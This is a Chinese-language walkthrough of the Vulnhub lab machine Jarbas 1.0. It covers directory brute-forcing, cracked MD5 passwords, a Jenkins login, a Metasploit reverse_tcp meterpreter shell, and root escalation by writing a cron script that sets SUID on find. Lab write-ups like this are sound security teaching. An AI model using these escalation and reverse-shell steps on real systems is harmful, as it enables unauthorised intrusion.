Vulnhub靶机系列:Jarbas1.0

这次的靶机是vulnhub靶机：Jarbas1.0,因为合天有在线靶机，就直接用合天的在线靶机了。

靶机地址及相关描述

https://www.vulnhub.com/entry/jarbas-1,232/
If you want to keep your hacking studies, please try out this machine!
Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s.
Objective: Get root shell!

靶机设置

略
本机ip：10.1.1.90
靶机ip：10.1.1.91

利用知识及工具

msf、nmap、计划任务错误配置

信息收集并getshell

因为刚才nmap已经扫过了，所以直接扫下目录
发现有cgi，考虑有没有可能cgi有问题，nikto扫一下
不过没啥收获
whatweb看下是不是主流cmswhatweb -vv ,不过好像也没啥

只能回到web功能上了，发现功能太复杂，卒。。。
重新回到dirb，毕竟dirb的强度还是不够

dirb http://222.182.111.137:80 /usr/share/dirb/wordlists/big.txt
dirb http://222.182.111.137:80 -X .php
dirb http://222.182.111.137:80 -X .html    #dirb的-X参数，代表匹配扩展名，默认字典是/usr/share/dirb/wordlists/common.txt，dirb自带的公共目录，会将字典内的内容加上扩展名去爆破

这玩意有点奇怪，康康

跑下md5

tiago：5978a63b4654c73c60fa24f836386d87 （italia99）
trmdade:f463f63616cb3f1e81ce46b39f882fd5 （marianna）
eder:9b38e2b1e8b12f426b0d208a7ab6cb98（vipsu）
试了下ssh，然后还是不行

整理思路，想法从开始的端口做突破

查看8080端口，发现了个东西叫jenkins，
而且这玩意可以登录 eder （vipsu）
搜了下漏洞，额，github还有其他的xep，但是这个靶机不提供外网，所以没法用gayhub的exp

然后就是msf了

我自己的一半一半的，这个看起来更完整

payload是这个

拿到shell

提权

生成交互式shell python -c ‘import pty; pty.spawn(“/bin/bash”)’
权限低的可怕,很多东西看不了，，，
不过有个5min的计划任务cat /etc/crontab

脚本内容

权限

本地创建一个shell脚本 CleaningScript.sh，内容

#!/bin/bash
chmod u+s /usr/bin/find

-s :在文件执行时把进程的属主或组ID置为该文件的文件属主。
重新获取shell，这次选择meterpreter的方便上传，payload

set payload linux/x86/meterpreter/reverse_tcp

等待5分钟查看find权限是否为 rwsr-xr-x
ls -la /usr/bin/find

通过find执行命令find /home -exec whoami \;

查看到flag